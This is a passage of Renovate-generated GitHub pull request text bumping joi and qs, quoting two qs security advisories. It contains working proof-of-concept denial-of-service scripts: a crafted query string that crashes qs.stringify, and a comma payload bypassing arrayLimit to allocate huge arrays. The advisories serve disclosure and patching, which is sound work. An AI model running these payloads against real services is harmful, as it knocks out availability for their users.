[https://github.com/hapijs/joi/pull/3143](https://redirect.github.com/hapijs/joi/pull/3143)
-
[https://github.com/hapijs/joi/pull/3145](https://redirect.github.com/hapijs/joi/pull/3145)
-
[https://github.com/hapijs/joi/commit/115e7b58d5eaaecc5e9b7093d41899ad6fb053ec](https://redirect.github.com/hapijs/joi/commit/115e7b58d5eaaecc5e9b7093d41899ad6fb053ec)
-
[https://github.com/hapijs/joi/commit/e70df424c367f2976db63b089504413744a21245](https://redirect.github.com/hapijs/joi/commit/e70df424c367f2976db63b089504413744a21245)
-
[https://github.com/advisories/GHSA-6h2x-m376-mqjq](https://redirect.github.com/advisories/GHSA-6h2x-m376-mqjq)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-6h2x-m376-mqjq)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>hapijs/joi (joi)</summary>

###
[`v17.13.7`](https://redirect.github.com/hapijs/joi/compare/v17.13.6...v17.13.7)

[Compare
Source](https://redirect.github.com/hapijs/joi/compare/v17.13.6...v17.13.7)

###
[`v17.13.6`](https://redirect.github.com/hapijs/joi/compare/v17.13.5...v17.13.6)

[Compare
Source](https://redirect.github.com/hapijs/joi/compare/v17.13.5...v17.13.6)

###
[`v17.13.5`](https://redirect.github.com/hapijs/joi/compare/v17.13.4...v17.13.5)

[Compare
Source](https://redirect.github.com/hapijs/joi/compare/v17.13.4...v17.13.5)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/googleapis/google-cloud-node).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4xMjUuMSIsInVwZGF0ZWRJblZlciI6IjQ0LjEyNS4xIiwidGFyZ2V0QnJhbmNoIjoibWFpbiIsImxhYmVscyI6W119-->
shivanee-p pushed a commit that referenced this pull request Oct 7, 2026
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [qs](https://redirect.github.com/ljharb/qs) | [`6.15.3` →
`6.16.0`](https://renovatebot.com/diffs/npm/qs/6.15.3/6.16.0) |
![age](https://developer.mend.io/api/mc/badges/age/npm/qs/6.16.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/qs/6.15.3/6.16.0?slim=true)
|

---

### qs: Denial of Service via Attacker Controlled isBuffer
[CVE-2026-82417](https://nvd.nist.gov/vuln/detail/CVE-2026-82417) /
[GHSA-4mjr-xmp4-gh2g](https://redirect.github.com/advisories/GHSA-4mjr-xmp4-gh2g)

<details>
<summary>More information</summary>

#### Details
##### Summary

`qs.stringify()` calls `utils.isBuffer()` on every value it serializes,
and `utils.isBuffer()` invokes `obj.constructor.isBuffer(obj)` without
checking that it is callable. A value whose own `constructor.isBuffer`
is a non-function makes `qs` call a non-callable and throw `TypeError`.
Such a value is produced **by `qs.parse` itself** from an untrusted
query string when `plainObjects: true` or `allowPrototypes: true` is
set, so a pure-`qs` `parse` → `stringify` round-trip — no `JSON.parse` —
turns an unauthenticated query string into an uncaught throw.

An attacker-controlled `parse` input reaches the host application's
availability asset — via `qs`'s own recommended `plainObjects`
mitigation — and triggers an uncaught exception during a `parse` →
`stringify` round-trip.

##### Details
`utils.isBuffer` runs at `lib/stringify.js:127` for every serialized
value:

```js
if (isNonNullishPrimitive(obj) || utils.isBuffer(obj)) { ... }
```

`utils.isBuffer` (`lib/utils.js:327-333`) invokes
`obj.constructor.isBuffer` without verifying it is callable:

```js
var isBuffer = function isBuffer(obj) {
    if (!obj || typeof obj !== 'object') { return false; }
    return !!(obj.constructor && obj.constructor.isBuffer && obj.constructor.isBuffer(obj));
};
```

`constructor` and `isBuffer` are ordinary keys. `qs.parse` with
`plainObjects: true` or `allowPrototypes: true` keeps them as own
properties, so the parsed value carries a non-function
`constructor.isBuffer`; `stringify` then calls a non-callable and throws
`TypeError`. By contrast `utils.isRegExp` uses a brand check
(`Object.prototype.toString`); the missing guard here is an internal
inconsistency, not a platform limitation.

##### Trust Boundary Note

`qs.stringify` alone treats its input as caller-constructed, so
serializing a hostile object could be argued outside its contract. This
report does not depend on that framing: the malicious shape is produced
by **`qs.parse`, whose input is untrusted by design**. `qs.parse`
normally strips a `constructor` key via its prototype guard, but with
the documented options `plainObjects: true` or `allowPrototypes: true`
the key survives and lands as an own property. Feeding the parsed object
back into `qs.stringify` — the standard round-trip in gateways and
request-forwarders — then hits the unchecked call.

##### PoC
`poc02c_isBuffer_qs_only_roundtrip.js` — pure-`qs` chain, no
`JSON.parse`; an untrusted query string alone reaches the throw:

```js
'use strict';
var qs = require('qs');

var untrustedQueryString = 'x%5Bconstructor%5D%5BisBuffer%5D=y'; // x[constructor][isBuffer]=y

var parsed = qs.parse(untrustedQueryString, { plainObjects: true });
console.log('[parse] kept constructor key:', JSON.stringify(parsed));

try {
    qs.stringify(parsed);
    console.log('[stringify] no throw (unexpected)');
} catch (e) {
    console.log('[stringify] DoS reproduced ->', e.constructor.name + ':', e.message);
}
```

`poc02_isBuffer.js` — the minimal defect:

```js
'use strict';
var qs = require('qs');
try {
    qs.stringify(JSON.parse('{"a":{"constructor":{"isBuffer":"x"}}}'));
} catch (e) {
    console.log('[A] DoS reproduced ->', e.constructor.name + ':', e.message);
}
```

`poc02b_isBuffer_async_crash.js` — worker death in an async sink:

```js
'use strict';
var qs = require('qs');

function handleRequestAsync(clientJsonBody) {
    try {
        setImmediate(function () {                 // async continuation, outside the try
            qs.stringify(JSON.parse(clientJsonBody)); // throws here, uncaught
        });
        console.log('[handler] returned 200 synchronously; async work scheduled');
    } catch (e) {
        console.log('[handler] caught synchronously (will NOT happen):', e.message);
    }
}
process.on('exit', function (code) {
    console.log('[proc] process exiting with code:', code);
});
handleRequestAsync('{"filters":{"constructor":{"isBuffer":"x"}}}');
```

##### Execution Steps

```bash
cd poc
npm install [email protected]
node poc02c_isBuffer_qs_only_roundtrip.js  # pure qs parse->stringify -> TypeError
node poc02_isBuffer.js                      # minimal defect -> TypeError inside stringify
node poc02b_isBuffer_async_crash.js         # async sink -> uncaught throw -> exit code 1
```

##### Reproduction Evidence

`poc02c_isBuffer_qs_only_roundtrip.js` :

```
[parse] kept constructor key: {"x":{"constructor":{"isBuffer":"y"}}}
[stringify] DoS reproduced -> TypeError: obj.constructor.isBuffer is not a function
```

`poc02_isBuffer.js`:

```
[A] DoS reproduced -> TypeError: obj.constructor.isBuffer is not a function
```

`poc02b_isBuffer_async_crash.js` :

```
[handler] returned 200 synchronously; async work scheduled
[proc] process exiting with code: 1
TypeError: obj.constructor.isBuffer is not a function
    at Object.isBuffer (.../qs/lib/utils.js:332:78)
    at stringify (.../qs/lib/stringify.js:127:45)
=== EXIT CODE: 1 ===
```

The pure-`qs` round-trip shows the malicious shape originates from
`qs.parse` of an untrusted query string, with no `JSON.parse`. The
synchronous `try/catch` in the async case does not catch the throw; the
process exits with code 1, denying service to all requests on that
worker.

##### Impact

An unauthenticated request degrades any endpoint that re-serializes
deserialized client data with `qs.stringify`. The primary impact is a
per-request failure: the handler throws and the framework returns HTTP
500. Where the call sits in an unguarded async continuation, the throw
escapes and the worker process exits, denying service to all requests it
was handling, which means a higher impact that depends on the
application's error handling, not on `qs`.

##### Recommended Fix

Replace the duck-type with a brand check mirroring `utils.isRegExp`:

```js
var isBuffer = function isBuffer(obj) {
    if (!obj || typeof obj !== 'object') { return false; }
    if (typeof Buffer !== 'undefined' && typeof Buffer.isBuffer === 'function') {
        return Buffer.isBuffer(obj);
    }
    return Object.prototype.toString.call(obj) === '[object Uint8Array]';
};
```

If duck-typing must remain, require `typeof obj.constructor.isBuffer ===
'function'` before invoking and wrap the call in `try/catch`.

#### Severity
- CVSS Score: 6.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N`

#### References
-
[https://github.com/ljharb/qs/security/advisories/GHSA-4mjr-xmp4-gh2g](https://redirect.github.com/ljharb/qs/security/advisories/GHSA-4mjr-xmp4-gh2g)
-
[https://nvd.nist.gov/vuln/detail/CVE-2026-82417](https://nvd.nist.gov/vuln/detail/CVE-2026-82417)
-
[https://github.com/ljharb/qs/commit/e83d321ffafb38cf210683ac31714fce6ce1c6c6](https://redirect.github.com/ljharb/qs/commit/e83d321ffafb38cf210683ac31714fce6ce1c6c6)
-
[https://github.com/advisories/GHSA-4mjr-xmp4-gh2g](https://redirect.github.com/advisories/GHSA-4mjr-xmp4-gh2g)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-4mjr-xmp4-gh2g)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### qs array-limit bypass via bracket-key comma parsing
[CVE-2026-82562](https://nvd.nist.gov/vuln/detail/CVE-2026-82562) /
[GHSA-x5fp-wj9c-mxmx](https://redirect.github.com/advisories/GHSA-x5fp-wj9c-mxmx)

<details>
<summary>More information</summary>

#### Details
##### Summary

`qs` `v6.15.3` allows bracket-key input to bypass `arrayLimit` and
`throwOnLimitExceeded` when `comma: true`. The input `a[]=1,2,3,4`
succeeds with `arrayLimit: 3`, while the equivalent plain-key input is
rejected.

Affected version tested:

```text
qs v6.15.3
commit 18d085e919dae70c8f1b200ab99323058edab2c2
```

##### Details

`parseArrayValue()` enforces the comma limit only for flat values. The
`a[]` form is marked non-flat, so its comma-separated value is wrapped
after parsing and the inner array is not checked. A single parameter can
therefore materialize arbitrarily large arrays.

##### PoC

```js
const qs = require('qs')
const options = { comma: true, arrayLimit: 3, throwOnLimitExceeded: true }

const result = qs.parse('a[]=1,2,3,4', options)
console.log(result.a[0].length) // 4; expected RangeError

const big = qs.parse('a[]=' + '1,'.repeat(1000000) + '1', { comma: true, arrayLimit: 20 })
console.log(big.a[0].length) // 1000001
```

On `v6.15.3`, the first input parses successfully and the second creates
an array with 1,000,001 elements. The equivalent `a=1,2,3,4` input
throws `RangeError` as expected.

##### Impact

An attacker who can supply a query string or form body can bypass
configured array limits and force excessive memory allocation, causing
denial of service. The limit must be applied after comma splitting and
before the resulting array is wrapped.

#### Severity
- CVSS Score: 6.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N`

#### References
-
[https://github.com/ljharb/qs/security/advisories/GHSA-w7fw-mjwx-w883](https://redirect.github.com/ljharb/qs/security/advisories/GHSA-w7fw-mjwx-w883)
-
[https://github.com/ljharb/qs/security/advisories/GHSA-x5fp-wj9c-mxmx](https://redirect.github.com/ljharb/qs/security/advisories/GHSA-x5fp-wj9c-mxmx)
-
[https://nvd.nist.gov/vuln/detail/CVE-2026-82562](https://nvd.nist.gov/vuln/detail/CVE-2026-82562)
-
[https://github.com/ljharb/qs/commit/8859c37470e11b42b547b275e4e9bd0bc8cc5464](https://redirect.github.com/ljharb/qs/commit/8859c37470e11b42b547b275e4e9bd0bc8cc5464)
-
[https://github.com/advisories/GHSA-x5fp-wj9c-mxmx](https://redirect.github.com/advisories/GHSA-x5fp-wj9c-mxmx)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-x5fp-wj9c-mxmx)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>ljharb/qs (qs)</summary>

###
[`v6.16.0`](https://redirect.github.com/ljharb/qs/blob/HEAD/CHANGELOG.md#6160)

[Compare
Source](https://redirect.github.com/ljharb/qs/compare/v6.15.3...v6.16.0)

- \[New] `stringify`: add a `depth` option to bound recursion depth
(default `Infinity`)
- \[Fix] stringify: serialize Date values when a filter is provided
- \[Fix] `parse`: enforce `arrayLimit` on comma groups under `[]=` when
`throwOnLimitExceeded` is set
- \[Fix] `parse`: flatten a collection appended to an overflowed array
([#&#8203;571](https://redirect.github.com/ljharb/qs/issues/571))
- \[Fix] `utils`: `isBuffer`: do not invoke a non-callable
`constructor.isBuffer`
- \[Fix] `stringify`: do not let `allowEmptyArrays` skip cycle detection
(or drop own keys) on an empty array with own properties
- \[Fix] `stringify`: encode dots in a top-level key with a primitive
value when encodeDotInKeys is set
([#&#8203;562](https://redirect.github.com/ljharb/qs/issues/562))
- \[Docs] threat model: clarify `stringify` deep-nesting DoS is
caller-bounded
- \[Docs] clarify `arrayLimit` is a representation threshold, not an
element-count cap
- \[Tests] `parse`: remove a test that pinned `[]=` comma groups
escaping `arrayLimit`
- \[Tests] `stringify`: pin current `encodeDotInKeys` separator-dot
behavior
- \[Dev Deps] update `@ljharb/eslint-config`, `eslint`
- \[Dev Deps] update `eslint`, `evalmd`

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/googleapis/google-cloud-node).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4xMjUuMSIsInVwZGF0ZWRJblZlciI6IjQ0LjEyNS4xIiwidGFyZ2V0QnJhbmNoIjoibWFpbiIsImxhYmVscyI6W119-->
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Projects

None yet

Development

Successfully merging this pull request may close these issues.

Firestore client library's limit API not handling limit(0) correctly

1 participant